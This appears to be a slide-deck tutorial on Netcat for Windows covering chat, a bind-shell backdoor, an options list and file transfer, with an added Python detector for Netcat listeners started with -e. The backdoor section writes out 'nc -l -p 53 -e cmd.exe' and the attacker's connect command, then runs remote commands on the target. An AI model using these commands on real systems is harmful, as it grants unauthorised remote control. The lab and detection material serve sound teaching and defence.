
Netcat Windowschatting and Backdoor 1

Uploaded by

saurabhkrp77

CHATTING AND BACKDOOR USING NETCAT (WINDOWS)

What is Netcat?

• Abbreviated as “nc”
• Computer networking service for reading from and writing to network connections using TCP or UDP
• Tool for debugging all kinds of network problems
• Also known as “TCP/IP Swiss Army Knife”

Features of Netcat

• Chatting
• Port Scanning
• Port Listening
• File transfer
• Backdoor (controlling remote system)

CHATTING USING NETCAT

• Sending and receiving messages on netcat
• We will use two instances of netcat running on one computer (1 host machine + 1 virtual machine)
• One instance will be the listener (server) (host) and the other will be the client (virtual)

Steps to perform chatting

1. Find the IP address of both machines.
2. In cmd, change your directory to nc111nt (the folder of netcat) on both the host and the virtual machine.
3. On the host machine, type the following command and press Enter:

   nc -l -p 31337

   (shown in next slide: Netcat as a listener on port 31337)
   • nc is the abbreviation of Netcat
   • -l represents listen mode for inbound connects
   • -p represents port
   • 31337 is a TCP port number (can use any)

4. In the virtual machine’s cmd, type the following and press Enter:

   nc 192.168.1.102 31337

   • nc is the abbreviation of Netcat
   • 192.168.1.102 is the IP address of the host (Windows) machine
   • 31337 is a TCP port number

5. Then we type hiii (any message) and press Enter; it will automatically appear in the host’s cmd.
   Message hiii appeared automatically in the host machine’s cmd.

Key points

• If we are communicating on a single machine, use “localhost” instead of the IP address of another machine
• We can type any message; this is just a demo
• We can use any port number
• It is a kind of client-server communication
• Netcat must be installed on both machines

BACKDOOR USING NETCAT

• To get a remote command prompt
• A backdoor is a means of access to a computer program that bypasses security mechanisms
• There will be 1 attacking machine (virtual) and 1 target machine (host)

Steps for creating Backdoor using Netcat

1. Find out the IP addresses of both machines.
2. In cmd, change your directory to nc111nt (the folder of netcat) on both the host and the virtual machine.
3. Then we type the following command on the host machine (shown in snapshot):

   nc -l -p 53 -e cmd.exe

   • nc or nc64.exe can be written in the command
   • -l represents listen mode for inbound connects
   • -p represents port
   • 53 is a TCP port number (can use any)
   • -e cmd.exe executes cmd.exe for the inbound connection; this is what opens the security hole
   • This puts the target machine in listening mode

4. Then on the attacking machine (Linux), execute the following command in the Linux terminal, using the IP address of the Windows machine:

   nc 192.168.1.102 53

   • nc represents netcat
   • 192.168.1.102 represents the IP address of the host machine (target)
   • 53 is the port number
   • After executing this command, it will take us to the target machine
   • Now we can do anything we want to do on the target’s machine

5. Now on the attacking machine, if we run “ipconfig”, it will show us the IP address of the target machine.
6. Now the target machine’s desktop (shown below) has no folder named NetcatDemo.
7. On the attacking machine, we run “mkdir NetcatDemo”; it will create the folder on the target machine’s desktop.
8. Screen showing the desktop of the target machine, now having a folder named NetcatDemo.
9. We can also execute the following command if we want the target machine to shut down after 50000 secs (your wish):
   • Shutdown represents the command that will shut down the target machine
   • -r represents that it has to run this command
   • -t represents the time after which the machine will shut down
   • 50000 represents the time in seconds

So, we can perform anything we want to do on the target machine.
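
A defender's view of the listener in step 3, as an added example that is not part of the original slides: it parses process command lines (for instance the command-line field of a process-creation log event) and flags Netcat started in listen mode together with -e. The sample command lines and the C:\nc111nt path are constructed, and matching only the binary names nc and nc64.exe is an assumption.

```python
import re
import shlex

# Binary names the slides mention; a renamed copy evades this name check,
# so pair it with hash- or network-based detection.
NC_NAMES = re.compile(r"^(nc|nc64)(\.exe)?$", re.IGNORECASE)
VALUE_FLAGS = set("egGiopsw")  # options in the slides' list that take a value

def parse_nc(cmdline):
    """Return {flag: value or True} for a netcat command line, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        return None
    if not argv:
        return None
    exe = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1]
    if not NC_NAMES.match(exe):
        return None
    flags, i = {}, 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if len(arg) < 2 or not arg.startswith("-"):
            continue                      # positional: remote host or port
        for pos, ch in enumerate(arg[1:], start=1):
            if ch in VALUE_FLAGS:
                rest = arg[pos + 1:]      # value glued on, as in -p53
                if not rest and i < len(argv):
                    rest, i = argv[i], i + 1
                flags[ch] = rest.strip('"')
                break
            flags[ch] = True              # boolean flag, as -l in -lvp
    return flags

def classify(cmdline):
    flags = parse_nc(cmdline)
    if flags is None:
        return "not-netcat"
    listening = "l" in flags or "L" in flags
    if "e" in flags:
        return "exec-listener" if listening else "exec"
    return "listener" if listening else "client"

# Constructed process-creation command lines (not captured from a real host).
SAMPLE = ["nc -l -p 31337", "nc 192.168.1.102 31337", "ipconfig /all",
          r'"C:\nc111nt\nc64.exe" -Lvp 53 -e cmd.exe']
ALERTS = [c for c in SAMPLE if classify(c) == "exec-listener"]
```

Only the last sample lands in ALERTS; the chat listener and client from the earlier steps classify as "listener" and "client" and are not flagged.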

Different OPTIONS in Netcat

• -d : detach from console
• -e prog : inbound program to exec
• -g gateway : source-routing hop point, up to 8
• -G num : source-routing pointer: 4, 8, 12, ...
• -h : help
• -i secs : delay interval for lines sent, ports scanned
• -l : listen mode
• -L : listen harder, re-listen on socket close
• -n : numeric-only IP addresses, no DNS
• -o file : hex dump of traffic
• -p port : local port number
• -r : randomize local and remote ports
• -s addr : local source address
• -t : answer telnet negotiation
• -u : UDP mode
• -v : level of verbosity (use twice for more verbosity)
• -w secs : timeout for connects and final net reads
• -z : zero-I/O mode (used for scanning)

For sharing file

For sending and receiving a file, these commands need to be written in Linux and Windows simultaneously. Here Aryan is the file which is sent from Linux to Windows, and kavitanet.txt is the file which is sent from Windows to Linux.

These commands need to be run on the Windows terminal.
